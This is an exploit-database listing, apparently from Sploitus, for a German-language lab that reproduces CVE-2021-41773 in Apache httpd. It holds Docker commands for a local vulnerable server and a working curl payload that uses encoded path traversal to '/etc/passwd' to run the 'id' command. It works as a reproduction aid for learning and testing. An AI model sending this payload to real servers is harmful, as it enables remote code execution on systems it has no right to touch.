Sploitus

Exploit for cve-2021-41773 CVE-2021-41773

kitploit Β· 2026-08-27

Exploit Code

MARKDOWN16 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-VUONGNV3389-SEC-CVE-2021-41773
# cve-2021-41773

## Server starten

$ docker build -t cve-2021-41773 .   
$ docker run --rm -d -p 80:80 cve-2021-41773

## Ausnutzung

curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

## Ursache

Fehlkonfiguration in der Datei httpd.conf in Kombination mit Path Traversal => RCE   
![image](https://assets.kitploit.com/production/public/readmes/52786/25b304fb5ed786f0f97f1c6ec15361648e837604e159a5dfcf8e2a86f8ec28c9/480f5429724f07409d12d0cebdce4d966d885da2cd6f2b533455f1a30b4c96ee-display-v1.webp)